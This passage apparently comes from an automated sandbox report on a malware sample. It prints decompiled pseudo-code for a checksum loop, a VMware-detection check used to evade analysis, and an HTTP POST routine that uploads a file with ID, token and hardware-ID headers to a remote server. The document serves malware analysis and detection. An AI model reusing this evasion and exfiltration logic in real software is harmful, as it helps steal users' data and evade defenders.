_t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[3] & 0x000000ff ^ ((_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  
*(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[4] & 0x000000ff ^ (((_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[3] & 0x000000ff ^ ((_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[6] & 0x000000ff ^ (((((_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^ 
 *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[3] & 0x000000ff ^ ((_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[4] & 0x000000ff ^ (((_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[3] & 0x000000ff ^ ((_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^ 
 *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[5] & 0x000000ff ^ ((((_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[3] & 0x000000ff ^ ((_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[4] & 0x000000ff ^ (((_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( 
*_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[3] & 0x000000ff ^ ((_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4);
                                        							_t46 =  &(_t46[8]);
                                        							_t47 = _t47 - 8;
                                        							_t80 = _t80 - 1;
                                        						} while (_t80 != 0);
                                        					}
                                        					if(_t47 != 0) {
                                        						do {
                                        							_t27 = _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4);
                                        							_t46 =  &(_t46[1]);
                                        							_t47 = _t47 - 1;
                                        						} while (_t47 != 0);
                                        					}
                                        					return  !_t27;
                                        				} else {
                                        					return 0;
                                        				}
                                        			}








                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 16fda53b70cea74b69500a5086dd4c9ae772247abf7394d237f3e72f772f45e1
                                        • Instruction ID: 51f664644f1dc2f680995a5ca5bffdfe7746acf2173bf0be8d3c57e55413b060
                                        • Opcode Fuzzy Hash: 16fda53b70cea74b69500a5086dd4c9ae772247abf7394d237f3e72f772f45e1
                                        • Instruction Fuzzy Hash: 11218E338788F701E3509A369C046A2A7D3DBCA247FBF85B9C684C7543D63DD103A121
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 71%
                                        			E29D81190(intOrPtr __edx) {
                                        				signed int _v8;
                                        				char _v12;
                                        				intOrPtr _v16;
                                        				signed int _v20;
                                        				intOrPtr _v24;
                                        				intOrPtr _v28;
                                        				signed int _v32;
                                        				intOrPtr _v36;
                                        				char _v40;
                                        				void* __ebx;
                                        				void* __esi;
                                        				signed int _t22;
                                        				intOrPtr _t30;
                                        				char _t36;
                                        				intOrPtr _t39;
                                        				intOrPtr* _t41;
                                        				intOrPtr _t42;
                                        				signed int _t43;
                                        
                                        				_t37 = __edx;
                                        				_t22 =  *0x29dd5664; // 0xd9555f04
                                        				_v8 = _t22 ^ _t43;
                                        				asm("cpuid");
                                        				_t41 =  &_v40;
                                        				 *_t41 = 1;
                                        				 *((intOrPtr*)(_t41 + 4)) = _t30;
                                        				 *((intOrPtr*)(_t41 + 8)) = 0;
                                        				 *((intOrPtr*)(_t41 + 0xc)) = __edx;
                                        				_t26 = _v32 & 0x80000000;
                                        				if((_v32 & 0x80000000) == 0x80000000) {
                                        					asm("cpuid");
                                        					 *_t41 = 0x40000000;
                                        					 *((intOrPtr*)(_t41 + 4)) = _t30;
                                        					 *((intOrPtr*)(_t41 + 8)) = 0;
                                        					 *((intOrPtr*)(_t41 + 0xc)) = __edx;
                                        					_v24 = _v36;
                                        					_t36 = 0;
                                        					_v16 = _v28;
                                        					_v20 = _v32;
                                        					_v12 = 0;
                                        					_t17 = _t36 + 0xd; // 0xd
                                        					_t26 = _t17;
                                        					while(1) {
                                        						_t37 =  *((intOrPtr*)(_t43 + _t36 - 0x14));
                                        						_t20 = _t36 + "VMwareVMware"; // 0x61774d56
                                        						if( *((intOrPtr*)(_t43 + _t36 - 0x14)) !=  *_t20) {
                                        							goto L4;
                                        						}
                                        						_t26 = _t26 - 4;
                                        						_t36 = _t36 + 4;
                                        						if(_t26 >= 4) {
                                        							continue;
                                        						}
                                        						goto L4;
                                        					}
                                        				}
                                        				L4:
                                        				_pop(_t42);
                                        				return E29DADF46(_t26, _t30, _v8 ^ _t43, _t37, _t39, _t42);
                                        			}





















                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 151d63c262abd5c6492f342dc419e9742d8b2f5d9790b4dfe8b1f86bbedc3811
                                        • Instruction ID: 2af4fc95627721255c261936a2c6fe7d6b690323dd554b4c5d90a4b81baeccae
                                        • Opcode Fuzzy Hash: 151d63c262abd5c6492f342dc419e9742d8b2f5d9790b4dfe8b1f86bbedc3811
                                        • Instruction Fuzzy Hash: 751118B190420A9FDB18CF99D5826AEFBF0FB48314F20C56ED45AE7701E634AA468B54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 62%
                                        			E29D98000(intOrPtr __ecx, long __edx, char* _a4, intOrPtr _a24, intOrPtr _a32, char* _a36, short _a40, void* _a44, int _a48, CHAR* _a52) {
                                        				DWORD* _v8;
                                        				char _v16;
                                        				signed int _v20;
                                        				char _v520;
                                        				char _v1032;
                                        				char _v1532;
                                        				void _v1788;
                                        				char _v2788;
                                        				char _v3788;
                                        				char _v4788;
                                        				void _v6788;
                                        				char _v11788;
                                        				intOrPtr _v11796;
                                        				DWORD* _v11800;
                                        				char _v11816;
                                        				void* _v11820;
                                        				void* _v11824;
                                        				long _v11828;
                                        				void* _v11832;
                                        				int _v11836;
                                        				long _v11840;
                                        				CHAR* _v11844;
                                        				void _v11848;
                                        				intOrPtr _v11852;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t124;
                                        				signed int _t125;
                                        				CHAR* _t134;
                                        				char* _t136;
                                        				void* _t137;
                                        				void* _t167;
                                        				CHAR* _t172;
                                        				int _t212;
                                        				long _t218;
                                        				long _t224;
                                        				intOrPtr _t234;
                                        				void* _t235;
                                        				void* _t236;
                                        				void* _t238;
                                        				CHAR* _t289;
                                        				void* _t290;
                                        				void* _t291;
                                        				char* _t293;
                                        				void* _t294;
                                        				void* _t295;
                                        				long _t299;
                                        				signed int _t300;
                                        				void* _t301;
                                        				void* _t303;
                                        				void* _t305;
                                        
                                        				_push(0xffffffff);
                                        				_push(E29DC2233);
                                        				_push( *[fs:0x0]);
                                        				E29DBCDB0(0x2e3c);
                                        				_t124 =  *0x29dd5664; // 0xd9555f04
                                        				_t125 = _t124 ^ _t300;
                                        				_v20 = _t125;
                                        				_push(_t125);
                                        				 *[fs:0x0] =  &_v16;
                                        				_t234 = _a32;
                                        				_t293 = _a36;
                                        				_v11824 = _a44;
                                        				_v11852 = __ecx;
                                        				_v11828 = __edx;
                                        				_v11836 = _a48;
                                        				_v11844 = _a52;
                                        				_v8 = 0;
                                        				E29DB5640( &_v11788, 0, 0x1388);
                                        				E29DB5640( &_v1532, 0, 0x1f4);
                                        				E29DB5640( &_v1032, 0, 0x200);
                                        				_t134 = HeapAlloc(GetProcessHeap(), 0, 0x800000);
                                        				_t270 =  &_v520;
                                        				_t289 = _t134;
                                        				E29DB5640( &_v520, 0, 0x1f4);
                                        				_t136 = _a4;
                                        				_t303 = _t301 + 0x30;
                                        				if(_a24 < 0x10) {
                                        					_t136 =  &_a4;
                                        				}
                                        				_t137 = InternetOpenA(_t136, 1, 0, 0, 0);
                                        				_v11832 = _t137;
                                        				_v11848 = 0x1d4c0;
                                        				InternetSetOptionA(_t137, 2,  &_v11848, 4);
                                        				_push("https://");
                                        				_push(_t234);
                                        				_v11840 = 0x100;
                                        				_v11820 = 0;
                                        				if( *0x29dd8550() == 0) {
                                        					_v11820 = 1;
                                        				}
                                        				_t312 = _v11832;
                                        				if(_v11832 == 0) {
                                        					_t235 = _v11840;
                                        					goto L28;
                                        				} else {
                                        					lstrcatA( &_v1532, E29DA46C0(0x10, _t289, _t312));
                                        					lstrcatA(_t289, "\r\n");
                                        					lstrcatA(_t289, "------");
                                        					lstrcatA(_t289,  &_v1532);
                                        					lstrcatA(_t289, "--");
                                        					lstrcatA(_t289, "\r\n");
                                        					lstrcatA( &_v520, "Cont");
                                        					lstrcatA( &_v520, "ent-Typ");
                                        					lstrcatA( &_v520, "e: multip");
                                        					lstrcatA( &_v520, "art/for");
                                        					lstrcatA( &_v520, "m-data; ");
                                        					lstrcatA( &_v520, "boun");
                                        					lstrcatA( &_v520, "dary=");
                                        					lstrcatA( &_v520, "----");
                                        					lstrcatA( &_v520,  &_v1532);
                                        					_t238 = _v11820;
                                        					_push(0);
                                        					_push(0);
                                        					_push(3);
                                        					_push(0);
                                        					_push(0);
                                        					if(_t238 == 0) {
                                        						_t252 = _a40;
                                        						_t270 = _v11832;
                                        						_t167 = InternetConnectA(_v11832, _t293, _a40, ??, ??, ??, ??, ??);
                                        						_v11820 = _t167;
                                        						_t294 = _t167;
                                        					} else {
                                        						_t270 = _a40;
                                        						_t294 = InternetConnectA(_v11832, _t293, _a40, ??, ??, ??, ??, ??);
                                        						_v11820 = _t294;
                                        					}
                                        					if(_t294 == 0) {
                                        						_t235 = _v11840;
                                        					} else {
                                        						_push(0);
                                        						if(_t238 == 0) {
                                        							_t252 = _v11824;
                                        							_push(0x400100);
                                        							_push(0);
                                        							_push(0);
                                        							_push("HTTP/1.1");
                                        							_push(_v11824);
                                        						} else {
                                        							_push(0xc00100);
                                        							_push(0);
                                        							_push(0);
                                        							_push("HTTP/1.1");
                                        							_push(_v11824);
                                        						}
                                        						_t235 = HttpOpenRequestA(_t294, "POST", ??, ??, ??, ??, ??, ??);
                                        						if(_t235 != 0) {
                                        							E29DB5640( &_v2788, 0, 0x3e8);
                                        							_t305 = _t303 + 0xc;
                                        							lstrcatA( &_v2788, "X-Id: ");
                                        							_t172 = E29D8E880(_t252,  &_v11816);
                                        							_v8 = 1;
                                        							if(_t172[0x14] >= 0x10) {
                                        								_t172 =  *_t172;
                                        							}
                                        							lstrcatA( &_v2788, _t172);
                                        							_v8 = 0;
                                        							if(_v11796 >= 0x10) {
                                        								_push(_v11816);
                                        								E29DADF3B();
                                        								_t305 = _t305 + 4;
                                        							}
                                        							_v11796 = 0xf;
                                        							_v11800 = 0;
                                        							_v11816 = 0;
                                        							HttpAddRequestHeadersA(_t235,  &_v2788, lstrlenA( &_v2788), 0x20000000);
                                        							E29DB5640( &_v3788, 0, 0x3e8);
                                        							lstrcatA( &_v3788, "X-Token: ");
                                        							lstrcatA( &_v3788, _v11844);
                                        							HttpAddRequestHeadersA(_t235,  &_v3788, lstrlenA( &_v3788), 0x20000000);
                                        							E29DB5640( &_v4788, 0, 0x3e8);
                                        							lstrcatA( &_v4788, "X-hwid: ");
                                        							lstrcatA( &_v4788, _v11836);
                                        							HttpAddRequestHeadersA(_t235,  &_v4788, lstrlenA( &_v4788), 0x20000000);
                                        							lstrcatA( &_v1032, "------");
                                        							lstrcatA( &_v1032,  &_v1532);
                                        							lstrcatA( &_v1032, "\r\n");
                                        							lstrcatA( &_v1032, "Content-Disposition: form-data; name=\"");
                                        							lstrcatA( &_v1032, "file");
                                        							lstrcatA( &_v1032, "\"\r\n\r\n");
                                        							_v11836 = lstrlenA(_t289);
                                        							_t299 =  &(( &(_v11836[_v11828]))[lstrlenA( &_v1032)]);
                                        							_v11824 = HeapAlloc(GetProcessHeap(), 0, _t299);
                                        							E29DB0010(_v11824,  &_v1032, lstrlenA( &_v1032));
                                        							E29DB0010(_v11824 + lstrlenA( &_v1032), _v11852, _v11828);
                                        							_t212 = lstrlenA(_t289);
                                        							E29DB0010(lstrlenA( &_v1032) + _v11828 + _v11824, _t289, _t212);
                                        							_t303 = _t305 + 0x3c;
                                        							_t291 = 0;
                                        							do {
                                        								_t218 = lstrlenA( &_v520);
                                        								_t270 =  &_v520;
                                        								HttpSendRequestA(_t235,  &_v520, _t218, _v11824, _t299);
                                        								if(HttpQueryInfoA(_t235, 0x13,  &_v1788,  &_v11840, 0) == 0) {
                                        									goto L20;
                                        								} else {
                                        									_push("200");
                                        									_t270 =  &_v1788;
                                        									_push( &_v1788);
                                        									if( *0x29dd8550() != 0) {
                                        										goto L20;
                                        									}
                                        								}
                                        								break;
                                        								L20:
                                        								Sleep(0x7530);
                                        								_t291 = _t291 + 1;
                                        							} while (_t291 < 6);
                                        							if(InternetReadFile(_t235,  &_v6788, 0x7cf,  &_v11828) != 0) {
                                        								while(1) {
                                        									_t224 = _v11828;
                                        									if(_t224 == 0) {
                                        										goto L28;
                                        									}
                                        									 *((char*)(_t300 + _t224 - 0x1a80)) = 0;
                                        									lstrcatA( &_v11788,  &_v6788);
                                        									_t270 =  &_v6788;
                                        									if(InternetReadFile(_t235,  &_v6788, 0x7cf,  &_v11828) != 0) {
                                        										continue;
                                        									} else {
                                        									}
                                        									goto L28;
                                        								}
                                        							}
                                        							L28:
                                        							_t294 = _v11820;
                                        						}
                                        					}
                                        				}
                                        				InternetCloseHandle(_t235);
                                        				InternetCloseHandle(_t294);
                                        				InternetCloseHandle(_v11832);
                                        				if(_a24 >= 0x10) {
                                        					_push(_a4);
                                        					E29DADF3B();
                                        				}
                                        				 *[fs:0x0] = _v16;
                                        				_pop(_t290);
                                        				_pop(_t295);
                                        				_pop(_t236);
                                        				return E29DADF46( &_v11788, _t236, _v20 ^ _t300, _t270, _t290, _t295);
                                        			}
























































                                        APIs
                                        • _memset.LIBCMT ref: 29D98074
                                        • _memset.LIBCMT ref: 29D98087
                                        • _memset.LIBCMT ref: 29D9809A
                                        • GetProcessHeap.KERNEL32(00000000,00800000), ref: 29D980A9
                                        • HeapAlloc.KERNEL32(00000000), ref: 29D980B0
                                        • _memset.LIBCMT ref: 29D980C6
                                        • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 29D980E3
                                        • InternetSetOptionA.WININET ref: 29D98105
                                        • StrCmpCA.SHLWAPI(?,https://), ref: 29D98125
                                        • lstrcatA.KERNEL32(?,00000000), ref: 29D98158
                                        • lstrcatA.KERNEL32(00000000,29DCFDA8), ref: 29D98164
                                        • lstrcatA.KERNEL32(00000000,------), ref: 29D98170
                                        • lstrcatA.KERNEL32(00000000,?), ref: 29D9817E
                                        • lstrcatA.KERNEL32(00000000,29DCFDB4), ref: 29D9818A
                                        • lstrcatA.KERNEL32(00000000,29DCFDA8), ref: 29D98196
                                        • lstrcatA.KERNEL32(?,Cont), ref: 29D981A8
                                        • lstrcatA.KERNEL32(?,ent-Typ), ref: 29D981BA
                                        • lstrcatA.KERNEL32(?,e: multip), ref: 29D981CC
                                        • lstrcatA.KERNEL32(?,art/for), ref: 29D981DE
                                        • lstrcatA.KERNEL32(?,m-data; ), ref: 29D981F0
                                        • lstrcatA.KERNEL32(?,boun), ref: 29D98202
                                        • lstrcatA.KERNEL32(?,dary=), ref: 29D98214
                                        • lstrcatA.KERNEL32(?,----), ref: 29D98226
                                        • lstrcatA.KERNEL32(?,?), ref: 29D9823A
                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 29D98260
                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 29D9827C
                                        • HttpOpenRequestA.WININET(00000000,POST,?,HTTP/1.1,00000000,00000000,00400100,00000000), ref: 29D982CA
                                        • _memset.LIBCMT ref: 29D982E8
                                        • lstrcatA.KERNEL32(?,X-Id: ,00000002,?,00000004), ref: 29D982FC
                                        • lstrcatA.KERNEL32(?,00000000), ref: 29D98325
                                        • lstrlenA.KERNEL32 ref: 29D9836D
                                        • HttpAddRequestHeadersA.WININET(00000000,?,00000000), ref: 29D9837C
                                        • _memset.LIBCMT ref: 29D98390
                                        • lstrcatA.KERNEL32(?,X-Token: ,?,?,?,?,?,20000000), ref: 29D983A4
                                        • lstrcatA.KERNEL32(?,?,?,?,?,?,?,20000000), ref: 29D983B8
                                        • lstrlenA.KERNEL32(?,20000000,?,?,?,?,?,20000000), ref: 29D983CA
                                        • HttpAddRequestHeadersA.WININET(00000000,?,00000000), ref: 29D983D9
                                        • _memset.LIBCMT ref: 29D983ED
                                        • lstrcatA.KERNEL32(?,X-hwid: ,?,?,?,?,?,?,?,?,20000000), ref: 29D98401
                                        • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,?,20000000), ref: 29D98415
                                        • lstrlenA.KERNEL32(?,20000000,?,?,?,?,?,?,?,?,20000000), ref: 29D98427
                                        • HttpAddRequestHeadersA.WININET(00000000,?,00000000), ref: 29D98436
                                        • lstrcatA.KERNEL32(?,------,?,?,?,?,?,?,?,?,20000000), ref: 29D98448
                                        • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,?,20000000), ref: 29D9845C
                                        • lstrcatA.KERNEL32(?,29DCFDA8,?,?,?,?,?,?,?,?,20000000), ref: 29D9846E
                                        • lstrcatA.KERNEL32(?,Content-Disposition: form-data; name=",?,?,?,?,?,?,?,?,20000000), ref: 29D98480
                                        • lstrcatA.KERNEL32(?,file,?,?,?,?,?,?,?,?,20000000), ref: 29D98492
                                        • lstrcatA.KERNEL32(?,",?,?,?,?,?,?,?,?,20000000), ref: 29D984A4
                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,20000000), ref: 29D984AB
                                        • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,20000000), ref: 29D984BE
                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,20000000), ref: 29D984D7
                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,20000000), ref: 29D984DE
                                        • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,20000000), ref: 29D984F1
                                        • _memmove.LIBCMT ref: 29D98506
                                        • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,20000000), ref: 29D98523
                                        • _memmove.LIBCMT ref: 29D98530
                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,20000000), ref: 29D98539
                                        • lstrlenA.KERNEL32(?,00000000,00000000), ref: 29D98548
                                        • _memmove.LIBCMT ref: 29D9855B
                                        • lstrlenA.KERNEL32(?,?,00000000), ref: 29D98574
                                        • HttpSendRequestA.WININET(00000000,?,00000000), ref: 29D98583
                                        • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 29D9859C
                                        • StrCmpCA.SHLWAPI(?,200), ref: 29D985B2
                                        • Sleep.KERNEL32(00007530), ref: 29D985C1
